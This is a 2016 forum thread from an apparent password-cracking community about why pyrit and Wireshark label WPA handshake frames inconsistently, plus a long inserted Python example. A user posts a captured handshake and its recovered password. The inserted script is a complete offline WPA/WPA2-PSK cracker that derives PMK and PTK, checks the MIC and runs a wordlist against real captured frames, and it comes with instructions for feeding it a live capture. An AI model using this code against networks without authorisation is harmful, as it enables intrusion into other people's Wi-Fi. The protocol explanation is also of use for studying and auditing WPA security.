Handshake analysis?????


frenchy1

Status: Cracker
Joined: Tue, 28 Jul 2015
Posts: 647
Team:
Reputation: 396 Reputation
Tue, 15 Mar 2016 @ 07:12:11

Hi

I keep coming across the same question about handshake validation.

Is pyrit correct when it says

#1: AccessPoint 90:f6:52:49:1a:9a ('AB2016'):
#1: Station 00:15:6d:da:c5:1b, 1 handshake(s):
#1: HMAC_SHA1_AES, bad, spread 1

when the same handshake is analysed in Wireshark it shows message 1 of 4 and message 4 of 4, yet when I run this against a wordlist the password is still FOUND?

What I have been led to believe is that you only require message 1 of 2 and message 2 of 4 to enable you to crack the password, as long as it is in the wordlist, but this is clearly not the case.

I have also had some handshakes where it would only find the handshake if it had been stripped by pyrit, which it would then show as a bad capture, then converted to .hccap, which would reveal the password; and then some again that would only find the password if you did not clean the file.

I am really just asking how many times we chase our tails trying the handshakes when there seem to be different variables on whether the handshake is valid or not.

I am sure you guys have thoughts on this or experiences you would like to share.

One thing is for sure: pyrit is not reliable at all for handshake analysis, and Wireshark can show message 1 of 4 and 4 of 4 and still find the password. It leads me to wonder if all these uploads with message 1 of 1 and message 2 of 2 are even worth running.

I am probably missing something really obvious, so please let me know.



Just a hobbyist

gpuhash_me

Status: Trusted
Joined: Sun, 08 Nov 2015
Posts: 822
Team: gpuhash team
Reputation: 1523 Reputation
Tue, 15 Mar 2016 @ 13:36:47

To calculate the current PTK candidate you need:

1. PMK = HMAC-SHA1(ESSID, key), where key is the current password candidate
2. "Pairwise key expansion" (fixed string)
3. ANonce (comes from frame 1/4 or 3/4 of the current handshake)
4. SNonce (comes from frame 2/4 of the same handshake)
5. BSSID (from any frame)
6. Station (client) MAC (from any frame)

We described the WPA authentication process here.

As you can see from the list, the most problematic field is SNonce, which comes from frame 2/4 only.
Frame 4/4 does not contain any nonce (the nonce field is zeroed), so I have no idea how you can crack a WPA password with 1/4 and 4/4 frames only.

Anyway, if you share your handshake, resulting hccap and password, we can investigate this issue further.


Head of cheap publicity department
Support, discounts, free offers for HK members
BTC: 1GpuHashTYDRn3S6jbLM4YwmutU5iVCxrf

frenchy1
Wed, 16 Mar 2016 @ 03:31:09

Hi gpuhashme,

Please see the links to the cap file and hccap file:

https://www.sendspace.com/file/m9fe2u
https://www.sendspace.com/file/5kpu2a

The password is AB2016:00156ddac51b:90f652491a9a:qwertyuiop




gpuhash_me
Wed, 16 Mar 2016 @ 09:40:16

Your frame 4/4 carries an SNonce value and has a replay counter of 1; I suppose it is actually frame 2/4 but was falsely reported by Wireshark as 4/4 for an unknown reason. The true 4/4 frame has replay counter 2 and a zeroed nonce value. Just my opinion.

BTW, our custom parser accepted your handshake and we found the password you mentioned above.



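Worked example, added here and not code from the thread or from gpuhash.me's own parser, of the two points gpuhash_me makes above: the PTK derivation his list describes, and deciding what a frame is from the frame itself (MIC and ACK flags, whether the nonce field is zero, the replay counter) instead of from the label a tool attaches to it. The EAPOL-Key frames, nonces and wordlist are constructed inline; the ESSID, MACs and password are the ones posted in the thread, but the frames are not the poster's capture. The message classification is a simplified heuristic of my own, not Wireshark's. One detail differs from the list as written: the PMK for WPA/WPA2-PSK is PBKDF2-HMAC-SHA1 over the passphrase with the ESSID as salt, 4096 rounds, 256 bits; the PRF-512 with the "Pairwise key expansion" label and the MIC (HMAC-SHA1 truncated to 16 bytes for key descriptor version 2, HMAC-MD5 for version 1) follow IEEE 802.11i.

```python
import hashlib
import hmac
import struct

# EAPOL-Key "Key Information" bits (IEEE 802.11i)
KI_VERSION_MASK = 0x0007   # 1 = HMAC-MD5/RC4, 2 = HMAC-SHA1/AES, 3 = AES-128-CMAC
KI_ACK = 1 << 7
KI_MIC = 1 << 8

# Byte offsets inside a full EAPOL frame: 4-byte 802.1X header, then the RSN key descriptor
OFF_NONCE, OFF_MIC = 17, 81


def build_eapol_key(key_info, replay_counter, nonce, mic=bytes(16), key_data=b""):
    """Serialise an RSN EAPOL-Key frame. Used here only to construct sample frames;
    in practice these bytes come straight out of a capture."""
    body = struct.pack(">BHHQ", 2, key_info, 16, replay_counter)  # descriptor type 2 (RSN), key info, key length, replay counter
    body += nonce + bytes(16) + bytes(8) + bytes(8) + mic          # key nonce, key IV, key RSC, key ID, key MIC
    body += struct.pack(">H", len(key_data)) + key_data
    return struct.pack(">BBH", 2, 3, len(body)) + body             # 802.1X version 2, packet type 3 (EAPOL-Key)


def parse_eapol_key(frame):
    """Extract the fields cracking needs and classify the message from its flags and
    nonce (simplified heuristic, an assumption of this example, not Wireshark's logic)."""
    if frame[1] != 3:
        raise ValueError("not an EAPOL-Key frame")
    _, key_info, _, replay = struct.unpack(">BHHQ", frame[4:17])
    nonce = frame[OFF_NONCE:OFF_NONCE + 32]
    ack, has_mic = bool(key_info & KI_ACK), bool(key_info & KI_MIC)
    if ack and not has_mic:
        msg = 1                      # 1/4: AP sends ANonce, no MIC yet
    elif ack and has_mic:
        msg = 3                      # 3/4: AP repeats ANonce, MIC over the frame
    elif has_mic and any(nonce):
        msg = 2                      # 2/4: station sends SNonce, MIC over the frame
    elif has_mic:
        msg = 4                      # 4/4: MIC only, nonce field zeroed
    else:
        msg = None
    return {"msg": msg, "version": key_info & KI_VERSION_MASK, "replay": replay,
            "nonce": nonce, "mic": frame[OFF_MIC:OFF_MIC + 16], "frame": frame}


def pmk_from_passphrase(passphrase, essid):
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """802.11i PRF-512: HMAC-SHA1(PMK, "Pairwise key expansion" || 0x00 || B || i), i = 0..3."""
    b = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + b + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def eapol_mic(kck, frame, version):
    """MIC over the whole EAPOL frame with its MIC field zeroed, keyed with KCK = PTK[0:16]."""
    zeroed = frame[:OFF_MIC] + bytes(16) + frame[OFF_MIC + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError("AES-128-CMAC (version 3) is not handled in this example")


def select_frames(frames):
    """Return (ANonce, frame carrying SNonce and MIC). A genuine 4/4 supplies neither."""
    parsed = [parse_eapol_key(f) for f in frames]
    anonce = next((p["nonce"] for p in parsed if p["msg"] in (1, 3)), None)
    m2 = next((p for p in parsed if p["msg"] == 2), None)
    if anonce is None:
        raise ValueError("no 1/4 or 3/4 frame: ANonce missing")
    if m2 is None:
        raise ValueError("no frame carries SNonce: 1/4 + zeroed-nonce 4/4 cannot yield a PTK")
    return anonce, m2


def crack(essid, ap_mac, sta_mac, frames, wordlist):
    """Return the candidate whose KCK reproduces the 2/4 MIC, or None if none matches."""
    anonce, m2 = select_frames(frames)
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, essid), ap_mac, sta_mac, anonce, m2["nonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, m2["frame"], m2["version"]), m2["mic"]):
            return candidate
    return None


# Constructed sample handshake (not the poster's capture): ESSID, MACs and passphrase
# as posted in the thread, nonces made up here.
ESSID = "AB2016"
AP_MAC = bytes.fromhex("90f652491a9a")
STA_MAC = bytes.fromhex("00156ddac51b")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def sample_handshake(passphrase="qwertyuiop"):
    """1/4, a correctly MIC'd 2/4 (replay counter 1) and a 4/4 (replay counter 2, zeroed nonce)."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ESSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    m1 = build_eapol_key(0x008a, 1, ANONCE)        # version 2, pairwise, ACK
    m2 = build_eapol_key(0x010a, 1, SNONCE)        # version 2, pairwise, MIC
    m2 = m2[:OFF_MIC] + eapol_mic(kck, m2, 2) + m2[OFF_MIC + 16:]
    m4 = build_eapol_key(0x030a, 2, bytes(32))     # version 2, pairwise, MIC, Secure
    m4 = m4[:OFF_MIC] + eapol_mic(kck, m4, 2) + m4[OFF_MIC + 16:]
    return m1, m2, m4
```

To use it on a real capture, hand crack() the raw EAPOL bytes of each frame (starting at the 802.1X version byte, after the 802.11 and LLC/SNAP headers). select_frames() then answers the question in the thread directly: if no frame with the MIC bit set and the ACK bit clear carries a non-zero nonce, there is no SNonce and the PTK cannot be derived, whatever the labels say; a frame tagged 4/4 by a tool that nevertheless holds a non-zero nonce and the station's first replay counter is treated as the 2/4 it behaves like.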

frenchy1
Wed, 16 Mar 2016 @ 19:23:37

Thank you for taking the time to explain how this works. You have been most helpful.




